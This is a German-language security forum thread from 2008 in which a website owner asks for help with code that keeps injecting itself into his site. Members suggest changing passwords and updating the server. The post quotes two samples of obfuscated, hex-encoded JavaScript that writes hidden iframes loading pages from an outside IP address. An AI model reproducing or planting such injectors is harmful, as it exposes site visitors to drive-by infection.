Zitat

Zudem fügt sich auf der eigenen Website (zinseszins.net) immer wieder von selbst Schadcode ein

welcher Code ? - erscheint etwas auf deiner Seite, was da nicht hingehört ? Hast du dir den Quellcode der Seite angesehen ?
__________
MfG Sabina

rund um die PC-Sicherheit

17.06.2008, 09:04

zzi

Member

Themenstarter

Beiträge: 31

#5 Die popups sind nun weg!

Hier zwei Beispiele des Codes, der auf der Website nach dem body tag immer wieder auftaucht:

Code

<script>function v483e3ca829a4c(v483e3ca829e51){ function v483e3ca82a257 
() {var v483e3ca82a653=16; return v483e3ca82a653;} 
return(parseInt(v483e3ca829e51,v483e3ca82a257()));}function 
v483e3ca82aa5b(v483e3ca82ae4f){ function v483e3ca82ba41 () {var 
v483e3ca82be3e=2; return v483e3ca82be3e;} var 
v483e3ca82b24d='';for(v483e3ca82b647=0; 
v483e3ca82b647<v483e3ca82ae4f.length; 
v483e3ca82b647+=v483e3ca82ba41()){ 
v483e3ca82b24d+=(String.fromCharCode(v483e3ca829a4c(v483e3ca82ae4f.substr(v483e3ca82b647,
 v483e3ca82ba41()))));}return v483e3ca82b24d;} document.write(v483e3ca82aa5b('3C5343524950543E77696E646F772E7374617475733D27446F6E652
73B646F63756D656E742E777269746528273C696672616D65206E61
6D653D303033323165623131207372633D5C276874
74703A2F2F37372E3232312E3133332E3135312F2E69662F676F2E68746D6
C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323238353133292B2765356466313462313630355C27207
7696474683D363333206865696768743D333631207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696
672616D653E27293C2F5343524950543E'));
</script>

Code

<!--
var d=document,kol=561;
function O10H4855CCB26208F(H4855CCB262888){  return( 
parseInt(H4855CCB262888,16));}function H4855CCB26347D(H4855CCB263879){ 
function H4855CCB26446D() {return 2;} var 
H4855CCB263C74='';for(H4855CCB264071=0; 
H4855CCB264071<H4855CCB263879.length; 
H4855CCB264071+=H4855CCB26446D()){ H4855CCB263C74 += ( 
String.fromCharCode 
(O10H4855CCB26208F(H4855CCB263879.substr(H4855CCB264071, 
H4855CCB26446D()))));}return H4855CCB263C74;} 
document.write(H4855CCB26347D('3C7363726970743E696628216D796961297B642E7772697
46528273C494652414D45206E616D653D4F31207372633D5C27687474703A2
F2F37372E3232312E3133332E3137
312F2E69662F676F2E6
8746D6C3F272B4D6174682E726F756E64284D6174682E72616E6
46F6D28292A343135343932292B2736315C272077696474683D3738312068656967687
43D353332207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F49465241
4D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->

17.06.2008, 10:20

Sabina

Ehrenmitglied

Beiträge: 29434

#6 ich habe noch mal nachgesehen, im moment ist der java code nicht zu sehen...ist wieder alles, wie es sein soll oder trägt sich der code immer wieder neu ein ?
__________
MfG Sabina

rund um die PC-Sicherheit

17.06.2008, 10:35

zzi

Member

Themenstarter

Beiträge: 31

#7 Momentan ist die Website ok. Aber der Code trägt sich von Zeit zu Zeit wieder neu ein. keine Ahnung wodurch. Habe jetzt auch die FTP-Daten erneuert. Der Server dürfte auch clean sein.

17.06.2008, 10:39

Sabina

Ehrenmitglied

Beiträge: 29434

#8 ich habe den Beitrag vrschoben, vielleicht kennt sich hier jemand mit java-scripts und schade-codes aus.
sobald der eintrag wieder auftaucht, melde dich.
__________
MfG Sabina

rund um die PC-Sicherheit

17.06.2008, 10:56

zzi

Member

Themenstarter

Beiträge: 31

#9 ok wir werden sehen - Danke !!

19.06.2008, 14:58

virenfinder

Member

Beiträge: 3716

#10 Hallo,
ich würde alle passwörter, die du für deinen server hast endern.
sie sollten sicher sein also sonderzeichen enthalten und so lang wie möglich sein.
weiterhin sollte dein server die neuesten updates bekommen und das regelmäßig. auch solltest du dich über einstellmöglichkeiten deines auf dem server befindlichen betriebssystemes informieren, die die sicherheit erhöhen.

Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren:

Seite(n): 1